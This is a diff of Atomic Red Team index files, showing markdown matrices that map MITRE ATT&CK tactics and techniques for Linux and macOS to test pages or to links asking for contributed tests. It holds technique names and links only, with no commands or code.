| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File Deletion](../../T1070.004/T1070.004.md) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Local Account](../../T1136.001/T1136.001.md) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Systemd Service](../../T1543.002/T1543.002.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Trap](../../T1546.005/T1546.005.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | | | [Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
| | | | | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
atomics/Indexes/Matrices/macos-matrix.md
+55 -64
View File
@@ -1,73 +1,64 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchd](../../T1053.004/T1053.004.md) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Local Accounts](../../T1078.003/T1078.003.md) | Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Emond](../../T1546.014/T1546.014.md) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
